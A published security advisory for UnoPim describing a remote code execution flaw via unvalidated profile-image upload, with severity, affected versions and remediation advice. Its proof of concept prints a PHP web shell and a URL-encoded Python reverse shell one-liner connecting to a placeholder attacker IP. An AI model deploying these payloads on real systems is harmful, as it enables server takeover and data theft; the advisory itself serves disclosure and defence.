GHSA-v22v-xwh7-2vrm

Suggest an improvement
Source
https://github.com/advisories/GHSA-v22v-xwh7-2vrm
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-v22v-xwh7-2vrm/GHSA-v22v-xwh7-2vrm.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-v22v-xwh7-2vrm
Aliases
Published
2025-08-21T14:26:31Z
Modified
2025-08-21T20:00:19.170021Z
Severity
  • 7.3 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P CVSS Calculator
Summary
UnoPim vulnerable to remote code execution through Arbitrary File upload
Details

Summary:

Affected Functionality: Image upload at User creation Endpoint: /admin/settings/users/create

Details

The image upload at the user creation feature performs only client side file type validation. A user can capture the request by uploading an image, capture the request through a Proxy like Burp suite. Make changes to the file extension and content. The .php file when accessed through the link runs the code we provided inside the file.

Modified part of the multipart request body:

Content-Disposition: form-data; name="image[]"; filename="poc.php"
Content-Type: application/x-php

<?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>

PoC

  1. Upload an image file as profile picture during user creation , now capture the request and modify. File content: <?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?> File name: poc.php Content-Type can be any, doesn't matter.
  2. Access the uploaded file e.g. http://localhost:8000/storage/admins/21/poc.php?cmd=ls // pass the command to run as parameter value for cmd, example running ls command on the system

Likewise the following reverse shell code ( reverse shell of other languages ) can be executed to create a connection to attacker controlled system Command:

python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",7000));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn("sh")%27

// Make sure netcat is running on port 7000 // change IP accordingly

Impact

Every user in the dashboard is allowed to change their profile picture, thus allowing any of these users to execute malicious actions at the Server level. Usually a server might host multiple applications, allowing execution of system commands allows complete control of the system. The impact of an RCE vulnerability can be full system compromise, access to database and filesystem, access other sensitive devices on the network. Please see the POC video: https://drive.proton.me/urls/PH1ESMKHMW#4Vxb2KNu3tmn

Recommendation:

Extension Validation: Whitelist allowed extensions. ( use endswith() check rather than contains() as an attacker can bypass such a restriction with filename: poc.jpg.php

Database specific 
{
    "nvd_published_at": "2025-08-21T16:15:34Z",
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-21T14:26:31Z",
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-434"
    ]
}
References

Affected packages

Packagist / unopim/unopim

Package

Name
unopim/unopim
Purl
pkg:composer/unopim/unopim

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.2.1

Affected versions

v0.*

v0.1.0
v0.1.1
v0.1.2
v0.1.3
v0.1.4
v0.1.5
v0.1.6
v0.2.0

Database specific 

{
    "last_known_affected_version_range": "<= 0.2.0"
}